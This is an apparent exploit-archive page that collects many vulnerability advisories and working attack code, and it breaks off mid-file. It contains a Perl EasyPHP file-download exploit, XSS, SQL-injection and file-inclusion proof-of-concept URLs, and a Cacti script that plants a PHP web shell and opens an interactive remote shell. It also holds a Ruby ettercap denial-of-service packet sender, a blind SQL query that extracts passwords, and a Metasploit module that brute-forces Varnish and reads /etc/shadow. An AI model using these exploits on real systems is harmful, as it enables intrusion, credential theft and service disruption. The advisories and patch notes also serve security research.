HireHackking

source: https://www.securityfocus.com/bid/47145/info EasyPHP is prone to a vulnerability that lets attackers to download arbitrary files because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the webserver process. Information obtained may aid in further attacks. EasyPHP 5.3.5.0 is vulnerable; other versions may also be affected. #!/usr/bin/perl # ********* In The name of Allah ************ ### # Title : EasyPHP Web Server 5.3.5.0 Remote File Download Exploit # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Windows # Impact : Remote Content/Download File # Tested on : Windows XP SP3 Fran�ais # Target : EasyPHP 5.3.5.0 ### # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) # ------------ # EasyPHP Web Server is vulnerable for a Remote File Download attcak, the following code will exploit the bug. # The vulnerability allows an unprivileged attacker to download files whom he has no permissions to. # ------------ # ********* In The name of Allah ************ system("title KedAns-Dz"); system("color 1e"); system("cls"); sleep(1); # Start Exploit : ** Allah Akbar ** use LWP::Simple; if (@ARGV < 3) { print("\r\n"); print("=================================================================\r\n"); print(" [*] EasyPHP Web Server 5.3.5.0 Remote File Download Exploit\r\n"); print(" [*] Discovered & Exploited by : KedAns-Dz\r\n"); print("=================================================================\r\n"); print(" [!] Usage: " .$0. " <host> <port> <file>\r\n"); print(" [!] HOST - An host using EasyPHP Web Server\r\n"); print(" [!] PORT - Port number\r\n"); print(" [!] FILE - The file you want to get\r\n"); print(" [!] Example: " .$0. " targetserver.com 80 index.php\r\n"); print("=================================================================\r\n\r\n"); sleep(1); exit(1); # ** Allah Akbar ** } else { print("=================================================================\n"); print(" [*] EasyPHP Web Server 5.3.5.0 Remote File Download Exploit\r\n"); print(" [*] Discovered & Exploited by : KedAns-Dz\r\n"); print("=================================================================\r\n\r\n"); sleep(2); ($host, $port, $file) = @ARGV; $content = get("http://" .$host. ":" .$port. "/" .$file. "."); print(" [+] File Content:\r\n\r\n"); sleep(2); print($content. "\r\n"); open (KDZ ,">","KedAns.log"); print KDZ "Log File Exploited By KedAns-Dz <ked-h(at)hotmail(dot)com>\r\n" . "Greets All Hackers Moslems & All My Friends \r\n" . "Target : http://$host:$port/$file \r\n" . "File Content : \n\n" . "=============================\r\n\n" . "$content"; print("\r\n"); print("=================================================================\n"); print "\n[+++] Creating And Download the Target File Content in KedAns.log \n"; } # ** In The Peace of Allah ** #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz # Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz # Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com) # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ # Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * exploit-id.com # www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... #================================================================================================

source: https://www.securityfocus.com/bid/47141/info The WPwizz AdWizz plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. AdWizz plugin 1.0 is vulnerable; other versions may also be affected. http://www.example.com/wordpress/wp-content/plugins/ad-wizz/template.php?link=%22;%3C/script%3E%3Cscript%3Ealert(0);{//

source: https://www.securityfocus.com/bid/47142/info The Placester WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Placester 0.1.0 is vulnerable; other versions may also be affected. http://www.example.com/wordpress/wp-content/plugins/placester/admin/support_ajax.php?ajax_action=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

source: https://www.securityfocus.com/bid/47150/info DoceboLMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. DoceboLMS 4.0.4 is vulnerable; other versions may also be affected. <html> <title>DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities</title> <body bgcolor="#1C1C1C"> <script type="text/javascript"> function xss1(){document.forms["xss1"].submit();} function xss2(){document.forms["xss2"].submit();} </script> <br /><br /> <form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=preassessment&op=modassessment" enctype="application/x-www-form-urlencoded" method="POST" id="xss1"> <input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" /> <input type="hidden" name="code" value=&#039;"><script>alert(1)</script>&#039; /> <input type="hidden" name="description" value="ZSL" /> <input type="hidden" name="id_assess" value="0" /> <input type="hidden" name="name" value=&#039;"><script>alert(2)</script>&#039; /> <input type="hidden" name="save" value="Save changes" /></form> <a href="javascript: xss1();" style="text-decoration:none"> <b><font color="red"><center><h3>Exploit PreAssessment Module!</h3></center></font></b></a><br /><br /> <form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=news&op=savenews" enctype="application/x-www-form-urlencoded" method="POST" id="xss2"> <input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" /> <input type="hidden" name="language" value="2" /> <input type="hidden" name="long_desc" value="" /> <input type="hidden" name="news" value="Insert" /> <input type="hidden" name="short_desc" value="ZSL" /> <input type="hidden" name="title" value=&#039;"><script>alert(1)</script>&#039; /></form> <a href="javascript: xss2();" style="text-decoration:none"> <b><font color="red"><center><h3>Exploit News Module!</h3></center></font></b></a><br /><br /> <a href="http://www.example.com/DoceboLMS_404/index.php?<script>alert(1)</script>" style="text-decoration:none"> <b><font color="red"><center><h3>Exploit URI XSS #1</h3></center></font></b></a><br /><br /> <a href="http://www.example.com/DoceboLMS_404/?<script>alert(1)</script>" style="text-decoration:none"> <b><font color="red"><center><h3>Exploit URI XSS #2</h3></center></font></b></a><br /><br /> <a href="http://www.example.com/DoceboLMS_404/docebolms/index.php/index.php?<script>alert(1)</script>" style="text-decoration:none"> <b><font color="red"><center><h3>Exploit URI XSS #3</h3></center></font></b></a><br /><br /> <a href="http://www.example.com/DoceboLMS_404/docebolms/?<script>alert(1)</script>" style="text-decoration:none"> <b><font color="red"><center><h3>Exploit URI XSS #4</h3></center></font></b></a><br /><br /> </body></html>

source: https://www.securityfocus.com/bid/47157/info Anantasoft Gazelle CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Anantasoft Gazelle CMS 1.0 is vulnerable; other versions may also be affected. http://www.example.com/search.php?lookup=<script>alert(888)</script> http://www.example.com//register.php?^name=&pass=&controle=&email=&showemail=&save=Save&table=users&active=0&activate=3fb04953d95a94367bb133f862402bce&location=%2FAnanta_Gazelle1.0%2Fregister.php&joindate=2011-04-05+07%3A58%3A50 [is vulnerable to &#039; input SQL inject]

source: https://www.securityfocus.com/bid/47158/info Yaws-Wiki is prone to multiple cross-site scripting vulnerabilities and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. Yaws-Wiki 1.88-1 is vulnerable; other versions may also be affected. Reflective XSS: http://www.example.com/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E http://www.example.com/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E http://www.example.com/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E Stored XSS: http://www.example.com/editPage.yaws?node=home

source: https://www.securityfocus.com/bid/47164/info Eleanor CMS is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Eleanor CMS rc5 is vulnerable; other versions may also be affected. SQL injection: http://www.example.com/download.php?module=1%27 http://www.example.com/upload.php?module=1%27 Cross-site scripting: POST /admin.php HTTP/1.1 user_name=111&pass=222&whereform="><script>alert("XSS");</script>&submit=%C2%EE%E9%F2%E8

source: https://www.securityfocus.com/bid/47166/info UseBB is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. UseBB 1.0.11 is vulnerable; other versions may also be affected. http://www.example.com/admin.php?act=/../../config

source: https://www.securityfocus.com/bid/47174/info XOOPS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. XOOPS 2.5.0 is vulnerable; other versions may also be affected. http://www.example.com/banners.php?click=../../../../../../../boot.ini%00 http://www.example.com/banners.php?click&url=../../../../../../../boot.ini%00 http://www.example.com/banners.php?click&bid=../../../../../../../boot.ini%00

source: https://www.securityfocus.com/bid/47177/info python-feedparser is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. <!-- Description: ensure nested CDATA sections are sanitized properly Expect: bozo and entries[0]['content'][0]['value'] == u'<![CDATA[]]>' --> <rss xmlns:content="http://www.example.com/rss/1.0/modules/content/" version="2.0"> <channel> <item> <content:encoded><![CDATA[<![CDATA[<script></script>]]>]]></content:encoded> </item> </channel> </rss

source: https://www.securityfocus.com/bid/47182/info TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. TextPattern 4.2.0 is vulnerable; other versions may also be affected. http://www.example.com/index.php?q=<script>alert(888)</script>

source: https://www.securityfocus.com/bid/47193/info Redmine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Redmine 1.0.1 and 1.1.1 are vulnerable; other versions may also be affected. http://example.com/projects/hg-helloworld/news/[xss]

source: https://www.securityfocus.com/bid/47245/info Microsoft Excel is prone to a buffer-overflow vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to open a specially crafted Excel file. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35573.zip

source: https://www.securityfocus.com/bid/47264/info PrestaShop is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. PrestaShop 1.3.6 and prior are vulnerable; other versions may also be affected. http://www.example.com/[path]/cms.php?rewrited_url=http://[Shell-Path]

source: https://www.securityfocus.com/bid/47263/info vtiger CRM is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. vtiger CRM 5.2.1 is vulnerable; other versions may also be affected. http://www.example.com/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

source: https://www.securityfocus.com/bid/47266/info Omer Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Omer Portal 3.220060425 is vulnerable; other versions may also be affected. http://www.example.com/arama_islem.asp?aramadeger=<script>alert(1)</script>

#!/bin/sh ############## # Exploit Title: Cacti - Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection # Date: 19/12/2014 # Exploit Author: Wireghoul # Software Link: http://docs.cacti.net/plugin:superlinks # Identifiers: CVE-2014-4644, EDB-ID-33809 # Exploit explanation through inline comments # Patch provided at the end # # This is the year where hope fails you -- Slipknot: Pulse of the maggots # ############## echo -e "\e[32m *-*, \e[31m ___________" echo -e "\e[32m ,*\/|\`| ; \e[31m /.'_______\`.\\" echo -e "\e[32m \\' | |'; *, \e[31m /( (_______\`-'\\" echo -e "\e[32m \ \`| | ;/ ) \e[31m \`.\`.______ \.'" echo -e "\e[32m : |'| , / \e[31m \`..-.___>.'" echo -e "\e[32m :'| |, / \e[31m \`.__ .'\e[0m" echo -e " _________\e[32m:_|_|_;\e[0m_______________\e[31m\`.'\e[0m_______[Wireghoul]___" echo -e " CACTI SUPERLINKS PLUGIN 1.4-2 REMOTE CODE EXECUTION PoC" echo if [ -z $1 ]; then echo -e "Usage $0 <superpluginurl>\n $0 http://example.com/cacti/plugins/superlinks/superlinks.php\n"; exit 2; fi # This exploit is a second order LFI through SQLI, so first we must write some data to disk # Luckily the application logs all sort of stuff, so lets poison the application log # The reason for this is manyfold, read on. curl --silent "$1?id=SHELL<?php+passthru(\$_GET\[c\])+?>LLEHS<?php+exit+?>" > /dev/null # Now lets analyse the vulnerability: # superlinks.php:21:if (isset($_GET['id'])) { # superlinks.php:22: $pageid=$_GET['id']; # superlinks.php:23:} # superlinks.php:24: # superlinks.php:25:$page = db_fetch_row("SELECT DISTINCT # superlinks.php:26: id, # superlinks.php:27: title, # superlinks.php:28: style, # superlinks.php:29: contentfile # superlinks.php:30: FROM (superlinks_pages, superlinks_auth) # superlinks.php:31: WHERE superlinks_pages.id=superlinks_auth.pageid # superlinks.php:32: AND id=" . $pageid . " # This is where the injection occurs, we can now union select 1,2,3,4 -- ftw # However the real fun occurs a few lines later # superlinks.php:57: $my_file = $config["base_path"] . "/plugins/superlinks/content/" . $page['contentfile']; # superlinks.php:58: # superlinks.php:59: if (file_exists($my_file)) { # superlinks.php:60: @include_once($my_file); # We can now include a file of our choosing (LFI) based on the data returned from the SQLi # There are only a few problems: # * We cannot use strings/quotes as magic quotes are usually on # * We do not know the local path for the LFI # * Usual tricks like /proc/self* have been patched # * Database server and web server may be different hosts # Lets solve the easy one first, we dont need to quote our strings, hex encoding works great # The second one is a little trickier, we can brute force LFI locations... or # We can dynamically locate a file path which is stored in the database and present on the webserver # $ mysqldump cacti | grep '\.log' # INSERT INTO `settings` VALUES ('path_php_binary','/usr/bin/php'),('path_rrdtool','/usr/bin/rrdtool'),('poller_lastrun','1414565401'),('path_webroot','/usr/share/cacti/site'),('date','2014-10-29 17:50:02'),('stats_poller','Time:0.1182 Method:cmd.php Processes:1 Threads:N/A Hosts:2 HostsPerProcess:2 DataSources:0 RRDsProcessed:0'),('stats_recache','RecacheTime:0.0 HostsRecached:0'),('path_snmpwalk','/usr/bin/snmpwalk'),('path_snmpget','/usr/bin/snmpget'),('path_snmpbulkwalk','/usr/bin/snmpbulkwalk'),('path_snmpgetnext','/usr/bin/snmpgetnext'),('path_cactilog','/var/log/cacti/cacti.log'),('snmp_version','net-snmp'),('rrdtool_version','rrd-1.4.x'),('superlinks_tabstyle','0'),('superlinks_hidelogo','0'),('superlinks_hideconsole','0'),('superlinks_db_version','1.4'),('auth_method','1'),('guest_user','guest'),('user_template','0'),('ldap_server',''),('ldap_port','389'),('ldap_port_ssl','636'),('ldap_version','3'),('ldap_encryption','0'),('ldap_referrals','0'),('ldap_mode','0'),('ldap_dn',''),('ldap_group_require',''),('ldap_group_dn',''),('ldap_group_attrib',''),('ldap_group_member_type','1'),('ldap_search_base',''),('ldap_search_filter',''),('ldap_specific_dn',''),('ldap_specific_password',''); # $ ls -la /var/log/cacti/cacti.log # -rw-r----- 1 www-data www-data 5838 Oct 29 17:50 /var/log/cacti/cacti.log # $ tail /var/log/cacti/cati.log # <snip> ERROR: SQL Assoc Failed!, Error:'1064', SQL:"SELECT graph_templates.id, graph_templates.name FROM (graph_local,graph_templates,graph_templates_graph) WHERE graph_local.id=graph_templates_graph.local_graph_id AND graph_templates_graph.graph_template_id=graph_templates.id AND graph_local.host_id=1 AND graph_templates.id=12 select 1,2,3,4 -- GROUP BY graph_templates.id ORDER BY graph_templates.name" # WINRAR! # We can now include the poisoned log file by fetching the log path from the database # and prepending it with the normal directory traversal pattern ../../../ using concat() # We traverse 8 deep, that's usually enough echo -ne "Dropping into shell, type exit to quit.\ncactishell> " while read line; do if [ "$line" == "exit" ]; then exit fi comand=`echo -n $line | sed -e's/ /+/g'` curl --silent "$1?id=123+union+select+1,2,3,concat(0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f,value)+from+settings+where+name=0x706174685f63616374696c6f67+--+-&c=$comand" | \ sed -n '/SHELL/, $p' | \ sed -e 's/.*SHELL//' |\ sed '/LLEHS/, $d' echo -n "cactishell> " done # Proposed patch # Vendor has a patch in a SVN repo somewhere: # http://bugs.cacti.net/bug_view_advanced_page.php?bug_id=2475 # Yet has not made the patch available, or responded to requests to do so: # http://forums.cacti.net/viewtopic.php?t=53711 #--- superlinks.php 2014-12-18 02:05:37.706013833 -0500 #+++ superlinks.php 2014-12-18 02:05:09.694014497 -0500 #@@ -19,7 +19,7 @@ # # $pageid = 0; # if (isset($_GET['id'])) { #- $pageid=intval($_GET['id']); #+ $pageid=$_GET['id']; # } # # $page = db_fetch_row("SELECT DISTINCT

source: https://www.securityfocus.com/bid/47267/info vtiger CRM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. vtiger CRM 5.2.1 is vulnerable; other versions may also be affected. http://www.example.com/vtigercrm/vtigerservice.php?service=%3Cscript%3Ealert%280%29%3C/script%3E

#Exploit Title: 6 Remote ettercap Dos exploits to 1 #Date: 19/12/2014 #Exploit Author: Nick Sampanis #Vendor Homepage: http://ettercap.github.io #Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz #Version: 8.0-8.1 #Tested on: Linux #CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379 #Make sure that you have installed packefu and pcaprub require 'packetfu' include PacketFu if ARGV.count < 4 puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface" puts "[-]Use valid mac for your interface, if you dont know"+ " victim's ip address use broadcast" exit end def nbns_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 137 u.payload = "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00" u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name u.payload << "\x00\x20" #type u.payload << "\x00\x01" #class u.payload << "A"*1000 #pad u.recalc u.to_w(ARGV[3]) end def gg_client u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[0] u.ip_daddr = ARGV[1] u.tcp_src = 3333 u.tcp_dst = 8074 u.payload = "\x15\x00\x00\x00" #gg_type u.payload << "\xe8\x03\x00\x00" #gg_len u.payload << "A"*1000 u.recalc u.to_w(ARGV[3]) end def dhcp_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[0] u.ip_saddr = ARGV[1] u.udp_src = 67 u.udp_dst = 4444 u.payload = "\x02"*236 u.payload << "\x63\x82\x53\x63" u.payload << "\x35" u.payload << "\x00\x05\x00" u.payload << "\x51" u.payload << "\x00" #size u.payload << "A" * 3 #pad u.recalc u.to_w(ARGV[3]) end def mdns_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 5353 u.payload = "\x11\x11" #id u.payload << "\x00\x00" #flags u.payload << "\x00\x01" #questions u.payload << "\x00\x00" #answer_rr u.payload << "\x00\x00" #auth_rrs u.payload << "\x00\x00" #additional_rr u.payload << "\x06router\x05local\x00" #name u.payload << "\x00\x01" #type u.payload << "\x00\x01" #class u.recalc u.to_w(ARGV[3]) end def mdns_dos_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 5353 u.payload = "\x11\x11" #id u.payload << "\x00\x00" #flags u.payload << "\x00\x01" #questions u.payload << "\x00\x00" #answer_rr u.payload << "\x00\x00" #auth_rrs u.payload << "\x00\x00" #additional_rr u.payload << "\x01" u.payload << "\x00\x01" #type u.payload << "\x00\x01" #class u.payload << "A"*500 u.recalc u.to_w(ARGV[3]) end def pgsql_server u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[1] u.ip_daddr = ARGV[0] u.tcp_src = 5432 u.tcp_dst = 3333 u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00" u.recalc u.to_w(ARGV[3]) end def pgsql_client u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[0] u.ip_daddr = ARGV[1] u.tcp_src = 3333 u.tcp_dst = 5432 u.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00" u.recalc u.to_w(ARGV[3]) end def pgsql_client_shell u = TCPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_saddr = ARGV[0] u.ip_daddr = ARGV[1] u.tcp_src = 3333 u.tcp_dst = 5432 u.payload = "\x70" u.payload << "\x00\x00\x03\xe9" #len u.payload << "A"*1000 u.payload << "\x00" u.recalc u.to_w(ARGV[3]) end def radius_header u = UDPPacket.new() u.eth_saddr = ARGV[2] u.eth_daddr = "ff:ff:ff:ff:ff:ff" u.ip_daddr = ARGV[1] u.ip_saddr = ARGV[0] u.udp_src = 4444 u.udp_dst = 1645 u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01" u.recalc u.to_w(ARGV[3]) end puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis" puts "[+]-1- nbns plugin CVE-2014-9377" puts "[+]-2- gg dissector CVE-2014-9376" puts "[+]-3- dhcp dissector CVE-2014-9376" puts "[+]-4- mdns plugin CVE-2014-9378" puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)" puts "[+]-6- radius dissector CVE-2014-9379" print "choice:" choice = $stdin.gets.chomp().to_i() case choice when 1 puts "[+]Sending nbns packet.." nbns_header when 2 puts "[+]Sending client gg packet.." gg_client when 3 puts "[+]Sending dhcp packet.." dhcp_header when 4 puts "[+]Sending mdns packet.." mdns_header mdns_dos_header when 5 puts "[+]Sending pgsql packet.." pgsql_client pgsql_server pgsql_client_shell when 6 puts "[+]Sending radius packet.." radius_header else puts "[-]Unrecognized command " end

# Exploit Title: miniBB 3.1 Blind SQL Injection # Date: 23-11-2014 # Software Link: http://www.minibb.com/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # CVE: CVE-2014-9254 # Category: webapps 1. Description preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp). File: bb_func_unsub.php $usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0); $allowUnsub=FALSE; $chkCode=FALSE; if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){ //trying to unsubscribe directly from email $chkField='email_code'; $chkVal=$_GET['code']; $userCondition=TRUE; $chkCode=TRUE; } else{ //manual unsubsribe $chkField='user_id'; $chkVal=$user_id; $userCondition=($usrid==$user_id); } if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal)) http://security.szurek.pl/minibb-31-blind-sql-injection.html 2. Proof of Concept http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != ' This SQL will check if first password character user ID=1 is c. If yes, it will sleep 5 seconds. 3. Solution: http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Varnish Cache CLI Interface Bruteforce Utility', 'Description' => 'This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce list of passwords. This module will also attempt to read the /etc/shadow root password hash if a valid password is found. It is possible to execute code as root with a valid password, however this is not yet implemented in this module.', 'References' => [ [ 'OSVDB', '67670' ], [ 'CVE', '2009-2936' ], # General [ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ], [ 'CVE', '1999-0502'] # Weak password ], 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(6082), OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", File.join(Msf::Config.data_directory, "wordlists", "unix_passwords.txt") ]), ], self.class) deregister_options('USERNAME', 'USER_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_USERS') end def run_host(ip) connect res = sock.get_once(-1,3) # detect banner if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth vprint_status("Varnishd CLI detected - authentication required.") each_user_pass { |user, pass| sock.put("auth #{Rex::Text.rand_text_alphanumeric(3)}\n") # Cause a login fail. res = sock.get_once(-1,3) # grab challenge if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth challenge = $1 secret = pass + "\n" # newline is needed response = challenge + "\n" + secret + challenge + "\n" response = Digest::SHA256.hexdigest(response) sock.put("auth #{response}\n") res = sock.get_once(-1,3) if (res =~ /107 \d+/) # 107 auth vprint_status("FAILED: #{secret}") elsif (res =~ /200 \d+/) # 200 ok print_good("GOOD: #{secret}") report_auth_info( :host => rhost, :port => rport, :sname => ('varnishd'), :pass => pass, :proof => "#{res}", :source_type => "user_supplied", :active => true ) sock.put("vcl.load #{Rex::Text.rand_text_alphanumeric(3)} /etc/shadow\n") # only returns 1 line of any target file. res = sock.get_once(-1,3) if (res =~ /root:([\D\S]+):/) # lazy. if ($1[0] == "!") vprint_error("/etc/shadow root uid is disabled.\n") else print_good("/etc/shadow root enabled:\nroot:#{$1}:") end else vprint_error("Unable to read /etc/shadow?:\n#{res}\n") end 